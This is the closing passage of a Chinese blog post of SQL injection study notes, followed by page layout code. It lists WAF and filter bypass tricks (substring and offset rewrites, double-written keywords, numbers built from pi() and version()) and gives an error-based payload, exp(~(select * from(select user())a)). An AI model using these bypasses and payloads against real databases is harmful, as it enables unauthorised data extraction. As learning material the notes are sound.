<p><strong>subsrt()函数使用substr(data from 1 for 1) 代替 substr(data,1,1)</strong> </p>
<p>from 1 for 1 :从1到1</p>
<p><strong>limit 0,1 使用 limit 0 offset 1 代替</strong></p>
<p>offset 1 ：偏移量1</p>
</blockquote>
<h3 id="其他系统关键字被过滤-拦截"><a href="#其他系统关键字被过滤-拦截" class="headerlink" title="其他系统关键字被过滤/拦截"></a>其他系统关键字被过滤/拦截</h3><ol>
<li>双写绕过关键字过滤</li>
<li>使用同义函数/语句代替，如if函数可用<code>case when condition then 1 else 0 end</code>语句代替。</li>
</ol>
<h3 id="数字被过滤-拦截"><a href="#数字被过滤-拦截" class="headerlink" title="数字被过滤/拦截"></a>数字被过滤/拦截</h3><blockquote>
<p>下表摘自<a target="_blank" rel="noopener" href="https://wooyun.js.org/drops/MySQL%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7.html">MySQL注入技巧</a></p>
</blockquote>
<table>
<thead>
<tr>
<th>代替字符</th>
<th>数</th>
<th>代替字符</th>
<th>数、字</th>
<th>代替字符</th>
<th>数、字</th>
<th></th>
<th></th>
</tr>
</thead>
<tbody><tr>
<td>false、!pi()</td>
<td>0</td>
<td>ceil(pi()*pi())</td>
<td>10\</td>
<td>A</td>
<td>ceil((pi()+pi())*pi())</td>
<td>20\</td>
<td>K</td>
</tr>
<tr>
<td>true、!(!pi())</td>
<td>1</td>
<td>ceil(pi()*pi())+true</td>
<td>11\</td>
<td>B</td>
<td>ceil(ceil(pi())*version())</td>
<td>21\</td>
<td>L</td>
</tr>
<tr>
<td>true+true</td>
<td>2</td>
<td>ceil(pi()+pi()+version())</td>
<td>12\</td>
<td>C</td>
<td>ceil(pi()*ceil(pi()+pi()))</td>
<td>22\</td>
<td>M</td>
</tr>
<tr>
<td>floor(pi())、~~pi()</td>
<td>3</td>
<td>floor(pi()*pi()+pi())</td>
<td>13\</td>
<td>D</td>
<td>ceil((pi()+ceil(pi()))*pi())</td>
<td>23\</td>
<td>N</td>
</tr>
<tr>
<td>ceil(pi())</td>
<td>4</td>
<td>ceil(pi()*pi()+pi())</td>
<td>14\</td>
<td>E</td>
<td>ceil(pi())*ceil(version())</td>
<td>24\</td>
<td>O</td>
</tr>
<tr>
<td>floor(version()) //注意版本</td>
<td>5</td>
<td>ceil(pi()*pi()+version())</td>
<td>15\</td>
<td>F</td>
<td>floor(pi()*(version()+pi()))</td>
<td>25\</td>
<td>P</td>
</tr>
<tr>
<td>ceil(version())</td>
<td>6</td>
<td>floor(pi()*version())</td>
<td>16\</td>
<td>G</td>
<td>floor(version()*version())</td>
<td>26\</td>
<td>Q</td>
</tr>
<tr>
<td>ceil(pi()+pi())</td>
<td>7</td>
<td>ceil(pi()*version())</td>
<td>17\</td>
<td>H</td>
<td>ceil(version()*version())</td>
<td>27\</td>
<td>R</td>
</tr>
<tr>
<td>floor(version()+pi())</td>
<td>8</td>
<td>ceil(pi()*version())+true</td>
<td>18\</td>
<td>I</td>
<td>ceil(pi()*pi()*pi()-pi())</td>
<td>28\</td>
<td>S</td>
</tr>
<tr>
<td>floor(pi()*pi())</td>
<td>9</td>
<td>floor((pi()+pi())*pi())</td>
<td>19\</td>
<td>J</td>
<td>floor(pi()*pi()*floor(pi()))</td>
<td>29\</td>
<td>T</td>
</tr>
</tbody></table>
<h2 id="报错注入详解"><a href="#报错注入详解" class="headerlink" title="报错注入详解"></a>报错注入详解</h2><h3 id="报错注入类型"><a href="#报错注入类型" class="headerlink" title="报错注入类型"></a>报错注入类型</h3><ul>
<li>大数溢出</li>
<li>函数报错</li>
<li>主键，字段重复</li>
</ul>
<h3 id="大数溢出"><a href="#大数溢出" class="headerlink" title="大数溢出"></a>大数溢出</h3><p>sql可以运行并处理的数是有限的，当数超过上限，便会发生大数溢出</p>
<ul>
<li><p>主要函数</p>
<p>  exp(),pow()</p>
<p>  exp和pow两个函数都用来计算次方，exp(2)表示e的2次,pow(2,2)表示2的2次</p>
<p>  <img src="image-20210526204055248.png" alt="image-20210526204055248"></p>
<p>  若平方过大，则报错</p>
<p>  <img src="image-20210526204130441.png" alt="image-20210526204130441"></p>
</li>
<li><p>payload</p>
<pre class="line-numbers language-sql"><code class="language-sql">exp<span class="token punctuation">(</span><span class="token operator">~</span><span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token operator">*</span> <span class="token keyword">from</span><span class="token punctuation">(</span><span class="token keyword">select</span> <span class="token keyword">user</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token number">a</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</li>
</ul>
<p>这里我也不懂，此方法仅限mysql5使用</p>
<h3 id="函数报错"><a href="#函数报错" class="headerlink" title="函数报错"></a>函数报错</h3><p><strong>最常见的是updatexml()和extractvalue()函数，在注入攻击中已经提及</strong></p>
<p>其他函数这里不想解释了，看最下面特别鸣谢吧</p>
<h1 id="特别鸣谢：https-xz-aliyun-com-t-7169"><a href="#特别鸣谢：https-xz-aliyun-com-t-7169" class="headerlink" title="特别鸣谢：https://xz.aliyun.com/t/7169"></a>特别鸣谢：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7169">https://xz.aliyun.com/t/7169</a></h1>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Atmujie</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://atmujie.github.io/2020/12/08/mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">http://atmujie.github.io/2020/12/08/mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Atmujie</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E6%95%B0%E6%8D%AE%E5%BA%93/">
                                    <span class="chip bg-color">数据库</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    
        <div class="disqus-card card" data-aos="fade-up">
    <div id="disqus_thread" class="card-content">
        <noscript>Please enable JavaScript to view the
            <a target="_blank" rel="noopener" href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
    </div>
</div>

<script type="text/javascript">
    disqus_config = function () {
        this.page.url = 'http://atmujie.github.io/2020/12/08/mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/';
        this.page.identifier = '/2020/12/08/mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/';
        this.page.title = 'mysql数据库与sql注入学习笔记';
    };
    let disqus_shortname = '';

    (function () { // DON'T EDIT BELOW THIS LINE
        let d = document, s = d.createElement('script');
        // 如：s.src = 'https://blinkfox.disqus.com/embed.js';
        s.src = '//' + disqus_shortname + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        max-width: 100%;
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; padding-left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="/libs/valine/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'GHiPEgESACHszUJMqTqLWQtF-gzGzoHsz',
        appKey: 'Lm6vLWBnRM3KIlhuo4tqDNDq',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: 'mm',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: 'just go go'
    });
</script>

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/2021/04/03/docker%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/8.jpg" class="responsive-img" alt="Docker基础学习">
                        
                        <span class="card-title">Docker基础学习</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2021-04-03
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Atmujie
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E8%BF%90%E7%BB%B4/">
                        <span class="chip bg-color">运维</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2020/11/28/php%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/22.jpg" class="responsive-img" alt="php学习笔记">
                        
                        <span class="card-title">php学习笔记</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-11-28
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Atmujie
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E8%AF%AD%E8%A8%80/">
                        <span class="chip bg-color">语言</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>


<!-- 代码块功能依赖 -->
<!-- <script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script> -->

<!-- 代码语言 -->
<!--  -->
<!-- <script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script> -->
<!--  -->

<!-- 代码块复制 -->
<!-- 
<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>
 -->

<!-- 代码块收缩 -->
<!--  -->

<!-- 代码块折行 -->
<!-- 
<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>
 -->

    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="/about" target="_blank">Atmujie</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/atmujie" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>















</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
